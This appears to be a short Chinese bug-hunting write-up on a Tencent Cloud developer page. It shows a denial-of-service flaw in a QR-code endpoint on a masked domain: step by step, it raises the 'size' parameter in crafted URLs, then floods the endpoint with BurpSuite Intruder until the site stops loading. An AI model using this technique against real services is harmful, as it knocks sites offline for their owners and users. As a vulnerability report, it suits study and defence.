漏洞知识库
关注
图片大小可控可导致DOS
来看这个URL:
https://www.xxx.com/normal/download/qrcode?size=200&convert=https://www.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1
注意这个参数:size=200
,可以看到下面服务器访问速度是76ms
,图片是948B
说明很快,那么我们把200
改成10000
构造URL:
https://www.xxx.com/normal/download/qrcode?size=10000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1
改成10000
的时候服务器响应速度是1.55s
,图片字节是161KB
了,那么我们继续改,改成38000
构造URL:
https://www.xxx.com/normal/download/qrcode?size=38000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1
这时候响应速度是15.90s
,图片字节变成了1.6MB
!说明验证码大小可控!
接着打开BurpSuite
抓包:访问40000
构造URL:
https://www.xxx.com/normal/download/qrcode?size=40000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1
接着吧数据包发送到Intruder
:(爆破40000后四位的参数,让BurpSuite访问)
最后访问它的域名:
https://www.xxx.com/
我这边网站一直在加载中!打不开!具体我没敢吧参数调大,怕吧网站整蹦了影响他们的业务….
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有